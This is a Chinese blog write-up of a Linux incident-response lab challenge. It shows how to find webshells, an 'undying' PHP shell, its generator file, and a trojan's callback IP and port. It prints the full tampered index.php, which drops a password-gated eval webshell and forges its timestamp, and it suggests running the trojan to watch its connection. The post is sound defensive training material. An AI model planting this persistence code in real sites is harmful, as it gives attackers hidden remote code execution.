【玄机】第一章 应急响应-Linux入侵排查

题目:

1.web目录存在木马,请找到木马的密码提交
2.服务器疑似存在不死马,请找到不死马的密码提交
3.不死马是通过哪个文件生成的,请提交文件名
4.黑客留下了木马文件,请找出黑客的服务器ip提交
5.黑客留下了木马文件,请找出黑客服务器开启的监端口提交

1.web目录存在木马,请找到木马的密码提交

方法一:命令查询

在/var/www/html路径下,输入命令

find ./ -name "*.php" |xargs grep "eval("

在这里插入图片描述

方法二:工具查询

把/var/www/html下载下来,放沙箱中跑一下:

shellpub

在这里插入图片描述

或者用D盾跑一下:

在这里插入图片描述

查看一下内容:

在这里插入图片描述

flag1:flag{1}

2.服务器疑似存在不死马,请找到不死马的密码提交

方法一:命令查询

在/var/www/html路径下,输入命令:

find ./ -name "*.php" |xargs grep "eval("

在这里插入图片描述

然后MD5在线网站解码5d41402abc4b2a76b9719d911017c592

在这里插入图片描述

方法二:工具查询

题目1使用沙箱跑的结果(上面的D盾也OK啦):

在这里插入图片描述

挨着查看一下内容,确定是你啦!!

在这里插入图片描述

MD5解码和上面一样。

flag2:flag{hello}

3.不死马是通过哪个文件生成的,请提交文件名

方法一:命令查询

在/var/www/html路径下,输入命令

在这里插入图片描述

打开index.php,在后面发现了关键语句,确定目标!

在这里插入图片描述

方法二:工具查询

依旧是题目1使用沙箱跑的结果,沙箱解决一半问题!

在这里插入图片描述

查看index.php的内容,找亮点:

<?php
include('config.php');
include(SYS_ROOT.INC.'common.php');
$path=$_SERVER['PATH_INFO'].($_SERVER['QUERY_STRING']?'?'.str_replace('?','',$_SERVER['QUERY_STRING']):'');
if(substr($path, 0,1)=='/'){
        $path=substr($path,1);
}
$path = Base::safeword($path);
$ctrl=isset($_GET['action'])?$_GET['action']:'run';
if(isset($_GET['createprocess']))
{
        Index::createhtml(isset($_GET['id'])?$_GET['id']:0,$_GET['cat'],$_GET['single']);
}else{
        Index::run($path);
}
$file = '/var/www/html/.shell.php';
$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';
file_put_contents($file, $code);
system('touch -m -d "2021-01-01 00:00:01" .shell.php');
usleep(3000);
?>

flag3:flag{index.php}

4.黑客留下了木马文件,请找出黑客的服务器ip提交

方法一:命令查询

在/var/www/html路径下,有一个shell(1).elf文件。在 Linux 下,一般木马后缀都为elf,所以先锁定目标!

在这里插入图片描述

这里需要先赋权限,然后执行,让其产生外联行为。注意执行后会卡在这里,再开一个终端窗口进行后续操作即可。

在这里插入图片描述

在新的窗口中输入命令:

netstat -alntup

在这里插入图片描述

方法二:工具查询

把shell(1).elf文件单独拿出来沙箱跑一下(这里换在线沙箱跑了,之前用的那个分析不出来),一眼确定!

微步在线云沙箱

在这里插入图片描述

flag4:flag{10.11.55.21}

5.黑客留下了木马文件,请找出黑客服务器开启的监端口提交

根据题目4就得到题目5的flag咯~

在这里插入图片描述

flag5:flag{3333}


参考链接:

https://blog.csdn.net/m0_63138919/article/details/138822190

https://blog.csdn.net/qq_63928796/article/details/140502608

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值